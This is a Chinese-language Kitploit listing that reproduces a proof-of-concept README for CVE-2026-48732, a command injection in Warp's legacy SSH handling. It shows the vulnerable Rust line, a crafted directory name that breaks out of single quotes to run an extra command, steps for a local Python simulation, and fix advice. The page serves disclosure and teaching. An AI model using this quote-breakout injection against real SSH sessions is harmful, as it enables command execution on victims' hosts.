Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/saku0512/cve-2026-48732-poc
漏洞分析漏洞利用渗透测试命令与控制学习与教育Payload 开发
GitHubsaku0512/cve-2026-48732-poc

CVE-2026-48732-poc

概念验证,演示 Warp 传统 SSH 后台命令处理中的操作系统命令注入(CVE-2026-48732)。包括易受攻击和修复后命令构造的本地模拟。

查看仓库
22个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-48732: Warp Remote SSH cwd 命令注入 PoC

English version

概述

这个仓库是 Warp 传统 SSH 后台命令处理中存在的高严重性 OS 命令注入漏洞 CVE-2026-48732 的概念验证 (PoC)。

受影响的 Warp 版本中,使用 SSH 会话报告的远程工作目录 (cwd) 来构建辅助命令。由于该路径中包含的单引号未被转义,攻击者控制的远程主机、仓库或目录名可能突破被引号包围的 cd 参数,在受害者已认证的 SSH 账户权限下,在远程主机上额外执行 shell 语法。

发现者: saku0512 (GitHub)

免责声明

本项目仅用于教育目的和道德安全测试。

作者对任何误用、损害或违法行为不承担任何责任。未经授权访问计算机系统是违法的。使用本软件即表示您同意仅在明确允许安全测试的环境中使用。

漏洞详情

  • CVE ID: CVE-2026-48732
  • GHSA ID: GHSA-qqpc-wvvw-4269
  • 类型: OS 命令注入 (CWE-78)
  • 影响: 在连接的 SSH 主机上执行远程命令
  • CVSS: 8.8 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
  • 受影响版本:
    • Warp >= v0.2023.03.21.08.02.stable_00
  • 已修复版本:
    • v0.2026.05.06.15.42.stable_01 及以上

根本原因

存在漏洞的传统 SSH 后台命令处理在将远程工作目录用单引号包裹时,未对路径中的单引号字符进行转义。

root@kitploit:~
command_str.push_str(&format!("cd '{current_directory_path}' && "));

例如,如果 current_directory_path 包含以下值:

root@kitploit:~
/tmp/warp-cve-2026-48732'; touch /tmp/warp_cve_2026_48732_confirmed; echo '

生成的 shell 命令如下:

root@kitploit:~
cd '/tmp/warp-cve-2026-48732'; touch /tmp/warp_cve_2026_48732_confirmed; echo '' && pwd

结果,插入的 touch 命令被 shell 解释为独立的命令。

修复在将路径放入单引号包裹的 shell 上下文之前,对嵌入的单引号进行转义。

Proof of Concept (使用方法)

1. 环境设置

确保已安装 Python 3。此 PoC 在本地模拟有漏洞的命令构建,不连接 Warp 或 SSH。

root@kitploit:~
python3 --version

2. 运行有漏洞的模拟

运行附带的脚本。

root@kitploit:~
python3 poc.py

预期输出将包含生成的有漏洞的命令以及表明标记文件已创建的成功消息。

root@kitploit:~
[!] SUCCESS: /tmp/warp_cve_2026_48732_confirmed was created.

3. 验证

检查标记文件,验证命令是否成功执行。

root@kitploit:~
ls -l /tmp/warp_cve_2026_48732_confirmed

如果文件存在,则表示在本地模拟中确认了命令注入的行为。

验证后,请删除标记文件。

root@kitploit:~
rm -f /tmp/warp_cve_2026_48732_confirmed

4. 运行修复后行为的模拟

运行修复后的命令构建器。

root@kitploit:~
python3 poc.py --mode fixed

在修复后的模拟中,嵌入的单引号会被转义,因此不应创建标记文件。

应对措施

请尽快将 Warp 更新至已修复版本。

此修复在构建传统 SSH 辅助命令之前,对远程路径中嵌入的单引号进行转义。从而防止攻击者控制的路径文本突破引号包围的 shell 参数。

参考信息

  • GHSA-qqpc-wvvw-4269
  • CVE-2026-48732
  • Warp fixing commit 88c344e2de662a935f0ef0896458494ef2413add
下载工具